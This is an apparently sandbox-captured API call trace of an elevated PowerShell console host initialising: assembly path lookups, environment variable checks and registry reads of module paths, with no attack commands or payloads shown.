	[0088.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.423] CoTaskMemAlloc (cb=0x804) returned 0x309f80
	[0088.423] GetConsoleTitleW (in: lpConsoleTitle=0x309f80, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0088.423] CoTaskMemFree (pv=0x309f80) 
	[0088.511] CoTaskMemAlloc (cb=0x804) returned 0x30a830
	[0088.511] GetConsoleTitleW (in: lpConsoleTitle=0x30a830, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0088.511] CoTaskMemFree (pv=0x30a830) 
	[0088.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.514] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0088.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.992] SetConsoleCtrlHandler (HandlerRoutine=0x22768dc, Add=1) returned 1
	[0089.130] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0089.130] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.130] CoTaskMemFree (pv=0x3080c0) 
	[0089.142] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x328
	[0089.144] CoCreateGuid (in: pguid=0x16df70 | out: pguid=0x16df70*(Data1=0x6b9ae5b9, Data2=0x6726, Data3=0x4555, Data4=([0]=0xae, [1]=0xb4, [2]=0x4, [3]=0xc9, [4]=0x9c, [5]=0xd1, [6]=0x51, [7]=0xb1))) returned 0x0
	[0089.145] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0089.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.145] CoTaskMemFree (pv=0x3080c0) 
	[0089.168] WinSqmIsOptedIn () returned 0x0
	[0089.169] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0089.169] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.169] CoTaskMemFree (pv=0x3080c0) 
	[0089.269] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0089.269] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.269] CoTaskMemFree (pv=0x3080c0) 
	[0089.270] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0089.270] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.271] CoTaskMemFree (pv=0x3080c0) 
	[0089.274] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0089.274] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.274] CoTaskMemFree (pv=0x3080c0) 
	[0089.276] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0089.276] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.276] CoTaskMemFree (pv=0x3080c0) 
	[0089.290] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0089.290] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.290] CoTaskMemFree (pv=0x3080c0) 
	[0089.291] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0089.291] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.291] CoTaskMemFree (pv=0x3080c0) 
	[0089.292] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0089.292] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.292] CoTaskMemFree (pv=0x3080c0) 
	[0089.297] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0089.297] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.297] CoTaskMemFree (pv=0x3080c0) 
	[0089.311] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0089.385] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.385] CoTaskMemFree (pv=0x3080c0) 
	[0089.391] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0089.391] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.391] CoTaskMemFree (pv=0x3080c0) 
	[0089.392] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0089.392] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.392] CoTaskMemFree (pv=0x3080c0) 
	[0090.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0090.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0090.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0090.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0090.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0090.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0090.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0090.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0090.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0090.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0090.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0090.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0090.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0090.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0090.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0090.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0090.440] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0090.440] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0090.440] CoTaskMemFree (pv=0x3080c0) 
	[0090.442] CoTaskMemAlloc (cb=0xcc) returned 0x2e08c0
	[0090.442] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2e08c0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0090.442] CoTaskMemFree (pv=0x2e08c0) 
	[0090.443] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x16dae8 | out: phkResult=0x16dae8*=0x32c) returned 0x0
	[0090.443] RegQueryValueExW (in: hKey=0x32c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16da6c, lpData=0x0, lpcbData=0x16da68*=0x0 | out: lpType=0x16da6c*=0x2, lpData=0x0, lpcbData=0x16da68*=0x6c) returned 0x0
	[0090.443] CoTaskMemAlloc (cb=0x70) returned 0x28d9f0
	[0090.443] RegQueryValueExW (in: hKey=0x32c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16da3c, lpData=0x28d9f0, lpcbData=0x16da38*=0x6c | out: lpType=0x16da3c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x16da38*=0x6c) returned 0x0
	[0090.443] CoTaskMemFree (pv=0x28d9f0) 
	[0090.443] CoTaskMemAlloc (cb=0xcc) returned 0x2e08c0
	[0090.443] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x2e08c0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0090.443] CoTaskMemFree (pv=0x2e08c0) 
	[0090.443] CoTaskMemAlloc (cb=0xcc) returned 0x2e08c0
	[0090.443] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2e08c0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0090.443] CoTaskMemFree (pv=0x2e08c0) 
	[0090.449] RegCloseKey (hKey=0x32c) returned 0x0
	[0090.449] CoTaskMemAlloc (cb=0xcc) returned 0x2e08c0
	[0090.449] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2e08c0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0090.449] CoTaskMemFree (pv=0x2e08c0) 
	[0090.449] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x16dae8 | out: phkResult=0x16dae8*=0x32c) returned 0x0
	[0090.449] RegQueryValueExW (in: hKey=0x32c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16da6c, lpData=0x0, lpcbData=0x16da68*=0x0 | out: lpType=0x16da6c*=0x0, lpData=0x0, lpcbData=0x16da68*=0x0) returned 0x2
	[0090.449] RegCloseKey (hKey=0x32c) returned 0x0
	[0090.511] CoTaskMemAlloc (cb=0x20c) returned 0x2ead50
	[0090.511] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2ead50 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0090.512] CoTaskMemFree (pv=0x2ead50) 
	[0090.512] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x16d670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0090.513] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0090.524] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0090.524] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0090.524] CoTaskMemFree (pv=0x3080c0) 
	[0090.525] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0090.525] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0090.525] CoTaskMemFree (pv=0x3080c0) 
	[0090.631] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0090.631] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0090.631] CoTaskMemFree (pv=0x3080c0) 
	[0090.631] CoTaskMemAlloc (cb=0x104) returned 0x3080c0
	[0090.631] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3080c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0090.631] CoTaskMemFree (pv=0x3080c0) 
	[0090.634] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d8d8 | out: phkResult=0x16d8d8*=0x334) returned 0x0
	[0090.635] RegQueryValueExW (in: hKey=0x334, lpValueName="path", lpReserved=0x0, lpType=0x16d8ec, lpData=0x0, lpcbData=0x16d8e8*=0x0 | out: lpType=0x16d8ec*=0x1, lpData=0x0, lpcbData=0x16d8e8*=0x74) returned 0x0
	[0090.636] RegQueryValueExW (in: hKey=0x334, lpValueName="path", lpReserved=0x0, lpType=0x16d85c, lpData=0x0, lpcbData=0x16d858*=0x0 | out: lpType=0x16d85c*=0x1, lpData=0x0, lpcbData=0x16d858*=0x74) returned 0x0
	[0090.636] CoTaskMemAlloc (cb=0x78) returned 0x28d9f0
	[0090.636] RegQueryValueExW (in: hKey=0x334, lpValueName="path", lpReserved=0x0, lpType=0x16d82c, lpData=0x28d9f0, lpcbData=0x16d828*=0x74 | out: lpType=0x16d82c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x16d828*=0x74) returned 0x0
	[0090.636] CoTaskMemFree (pv=0x28d9f0) 
